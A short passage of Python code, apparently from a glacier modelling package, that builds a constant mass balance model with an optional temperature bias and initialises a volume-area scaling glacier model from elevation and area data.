# instance mass balance model
mb_mod = ConstantVASMassBalance(gdir, mu_star=None, bias=bias, y0=y0,
halfsize=halfsize,
filename=climate_filename,
input_filesuffix=climate_input_filesuffix)
if temperature_bias is not None:
# add given temperature bias to mass balance model
mb_mod.temp_bias = temperature_bias
# instance the model
min_hgt, max_hgt = get_min_max_elevation(gdir)
if init_area_m2 is None:
init_area_m2 = gdir.rgi_area_m2
model = VAScalingModel(year_0=0, area_m2_0=init_area_m2,
min_hgt=min_hgt, max_hgt=max_hgt,
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.